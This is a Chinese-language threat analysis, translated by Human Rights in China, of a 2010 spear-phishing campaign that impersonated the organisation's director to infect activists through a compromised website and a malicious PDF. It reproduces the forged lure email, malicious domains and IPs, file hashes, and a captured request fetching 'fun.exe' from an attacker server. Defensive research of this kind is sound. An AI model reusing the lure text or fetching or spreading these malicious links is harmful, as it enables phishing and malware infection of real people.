Skip to content Skip to navigation

人權與惡意軟件攻擊

2010年07月16日

納爾特·維倫紐夫

由中國人權翻譯

2010年3月18日,一個匿名的網絡攻擊者發出了一封“魚叉式釣魚”郵件,看上去像是中國人權執行主任譚競嫦群發給各個組織和個人的。攻擊者的郵件藉著中國人權的信譽,慫恿收件者去訪問一個已被攻佔且帶有惡意代碼的網站。這種代碼是設計來讓攻擊者最終完全控制訪問者的電腦的。現在,這些有針對性的惡意軟件攻擊已十分普遍,進一步擴大了民間組織所面臨的威脅。

介紹

互聯網審查只是“社會控制系統”中的一部分,用以限制和控制信息在中國的流動。審查與監視兩者的結合,目的在於對自我審查行為產生影響,從而使大部分人不會主動去尋找被禁的信息,更不用說去尋找避開控制的辦法了。而那些政治活躍人士和公開反對審查等打壓政策的人就不僅僅是被審查,還有可能遭受到各種各樣的威脅。

2008年, 一份題為《侵犯信任: 對中國Tom-Skype平台實行的監視和安全實踐的分析》(Breaching Trust: An Analysis of Surveillance and Security Practices on China’s TOM-Skype Platform)的報告,揭露了Skype與其中國夥伴北京雷霆萬鈞網絡科技(Tom Online)所運作的監視網絡。該網絡以不安全的方式儲存了數百萬條記錄,包括任何文字聊天、網絡電話以及敏感聊天信息在內的交往細節。這些被儲存信息中很大部分內容與呼籲中國公民退出共產黨的政治運動有關。

目前,針對民間組織、人權團體、媒體機構和西藏支持者的惡意軟件攻擊事件的數量一直在增加。通常情況下,成為攻擊目標的用戶會收到一封電子郵件,看上去很像是他們組織裡所熟悉的某個人發出的,郵件內還有一些文字,內容有時具體有時籠統,要求用戶打開一個附件(或訪問一個網站),通常是一個PDF或Microsoft Office的文檔。

如果用戶使用帶有安全漏洞的Adobe Reader或Microsoft Office(其它軟件也有被攻擊者利用的)去打開這個附件,而其電腦中又沒有反病毒軟件,他們的電腦很可能會被劫持。通常情況下,一個被嵌入惡意文件的正常文本,在攻擊成功後會自動開啟,因此,收件人不會產生懷疑。

用戶的電腦被攻克後,就會向攻擊者的指令控制服務器報告。這時攻擊者就完全控制了用戶的系統。攻擊者能竊取文件、電郵,輸送數據,或迫使其下載更多惡意軟件,還可能利用被控制的電腦作為工具,進一步利用受害者的聯絡信息或其它目標網絡中的計算機。

在過去的一年 裡,“信息戰觀察員”(Information Warfare Monitor)已發現了兩個電腦間諜網絡,調查了許多有針對性的惡意軟件攻擊,並發表了兩份報告:《跟蹤幽靈網:網絡間諜系統調查》(Tracking GhostNet: Investigating a Cyber Espionage Network)和《雲中陰影:電腦間諜2.0調查》(Shadows in the Cloud: An Investigation into Cyber Espionage 2.0)。

第一份報告中的“幽靈網”,是一個分佈在103個國家的1200多部被攻克電腦的網絡。我們發現並確定其中的30%是“高價值”目標,包括外交部、大使館、國際組織、新聞機構,以及一部位於北約總部的電腦。儘管我們可以確定這些機構已經被攻克,但我們只能推斷攻擊者所能夠獲取的數據。我們的跟進調查還發現了“影子網絡”。

與幽靈網不同,我們能夠獲得被攻擊者竊取的數據。我們能夠進入影子網絡的一部分,那部分的重點是從印度提取敏感信息。我們復原了各種各樣的文件,其中包括一封加密的外交信函,兩份標有“秘密”的文件,六份“限閱”文件和五份“機密”文件,這些文件看來是屬於印度政府機構,包括印度國家安全委員會秘書處、印度駐喀布爾大使館、印度駐莫斯科大使館、印度駐迪拜總領事館,以及印度駐尼日利亞阿布賈的高級委員會。我們還復原了一些文件,包括達賴喇嘛辦公室於2009年1月至11月間發送的1500封信。

從被攻擊的組織機構和攻擊者所竊取數據的性質來看,確實顯示了與中華人民共和國的戰略利益有關,但我們不能確定這些攻擊者與中國國家機構有任何直接聯繫。

調查

概述

2010年3月18日,一個匿名攻擊者發出了一封“魚叉式釣魚”電郵,看上去像是中國人權執行主任譚競嫦群發給各個組織和個人的。電郵的題目是“微軟,警察和聯邦調查局的密探”,電郵附了一個JPG格式的文件,攻擊者的目標是要收件者去訪問電郵中含有的一個鏈接。這個鏈接www.cfcr2008.org將收件者導向另一網站cfcr.i1024.com,而這個網站已經被攻擊者攻克並植入了代碼,代碼會使訪問網站者打開www.520520.com.tw的一個惡意PDF格式文件。該文件利用Adobe Reader的安全漏洞去攻克訪問者的電腦。被攻克的電腦會被連接到一個受攻擊者控制的網站www.humanright-watch.org,下載更多的惡意軟件,然後最終被連接到攻擊者設在中國的指令控制服務器360liveupdate.com。

假冒的電郵

發件人: 譚競嫦(Sharon Hom <mailto:sharon.hom@hrichina.org>
收件人: [略]
發送時間:2010年3月18日,星期四,上午9點46分
題目: 微軟,警察和聯調局的密探

我得到了一份被洩露的微軟機密文件《全球刑事遵守手冊》的副本。文件為警察和情報機構詳細解釋了微軟從其網絡客戶那裡蒐集什麼樣的信息,以及怎樣進入。已經被蒐集和可能被蒐集的個人信息相當全面,包括你的電子郵件、登錄和使用服務的信息、你的信用卡信息等詳細資料。附件是該文件的掃描複印件。

欲獲得完整文件,請訪問http://www.cfcr2008.org

电子邮件的收发信息栏

這封電子郵件雖然看似發自中國人權,但實際上卻是從下面電郵地址發出的:

Sender: selina@avghost.net <mailto:selina@avghost.net>
Received: from mail.idcsea.com.cn (mail.idcsea.com.cn [208.77.45.130])
X-mailer: Foxmail 5.0 [cn]

 

這封電子郵件的標題,透露了攻擊者實際上是從以下IP地址發送這一郵件的:

208.77.45.130
OrgName: DCS Pacific Star, LLC
OrgID: DCSPA
Address: 5050 El Camino Real, #238
City: Los Altos
StateProv: CA
PostalCode: 94022
Country: US

這封郵件慫恿收件人去訪問名為“公民權利聯盟”(Coalition for Citizen's Rights)組織的網站cfcr2008.org。這是一個經常發出反對中國政府聲音的組織。攻擊者攻克了這一網站,植入了惡意代碼,導致有安全漏洞的訪問者無意中下載了能導致電腦感染惡意軟件的PDF文檔。見表1、表2。

表1 被攻克网站: cfcr2008.org -> cfcr.i1024.com

表2 js_men.asp

這一惡意PDF格式文件被存放在一個台灣的網站www.520520.com.tw (203.69.42.41)。反病毒軟件對該惡意文件的識別率很低。42個反病毒軟件產品中僅有8個能偵查出其為惡意軟件。見表3。

表3

Filename readme.pdf
Filetype PDF
CVE ?
MD5 72bdca7dd12ed04b21dfa60c5c2ab6c4

Virustotal: 8/42 (19.05%)
http://www.virustotal.com/analisis/dbfded7c7401b8128f39f8e8834bafe7a11ad...

http://wepawet.cs.ucsb.edu/view.php?hash=f2275da93b6f708e80a84176f64d7df...

這一惡意PDF格式文件含有的惡意軟件給出了另一個鏈接,這次是www.humanright-watch.org (204.16.193.39)。這是一個受攻擊者控制的服務器。惡意軟件向另一個執行文件發出指令。這一執行文件看起來是加密的,反病毒產品無法測出其為惡意軟件。見表4。

表4

GET /fun.exe HTTP/1.1
Host: www.humanright-watch.org

Filename fun.exe
Filetype EXE
CVE ?
MD5 ec16143a14c091100e7af30de03fce1f

Virustotal: 0/42 (0%)
http://www.virustotal.com/analisis/8cc9dc5d07b4a9b4dca13923779a16a17e772...

有趣的是,www.humanright-watch.org (204.16.193.39)的IP地址和被用於發送惡意郵件的IP地址(208.77.45.130)都分配給了同一家公司——DCSPacific Star, LLC。

www.humanright-watch.org (204.16.193.39)上下載的新的惡意軟件,開始與位於中國的360liveupdate.com網站 (117.85.48.157) 的指令控制服務器進行加密通訊聯絡。見表5。

表5

這一指令控制服務器位於中國江蘇省:

117.85.48.157
inetnum: 117.80.0.0 - 117.95.255.255
netname: CHINANET-JS
descr: CHINANET jiangsu province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN

結論

審查、監視和惡意軟件攻擊三者並舉,使中國有可能實行更加嚴厲的信息控制政策,並超越國界,影響到世界其它民間組織。目前,有關針對民間組織的惡意軟件攻擊的報導越來越多。在許多案例中,這種攻擊行為可以追蹤到位於中國的指令控制基地。這些攻擊憑藉社會和政治網絡內部成員相互間的信任,利用人權主題和假冒的身份,慫恿目標用戶去執行惡意代碼的指令。這樣,匿名攻擊者就完全控制了用戶的電腦,並能從事監視、提取敏感信息和利用該電腦做為未來攻擊的基地。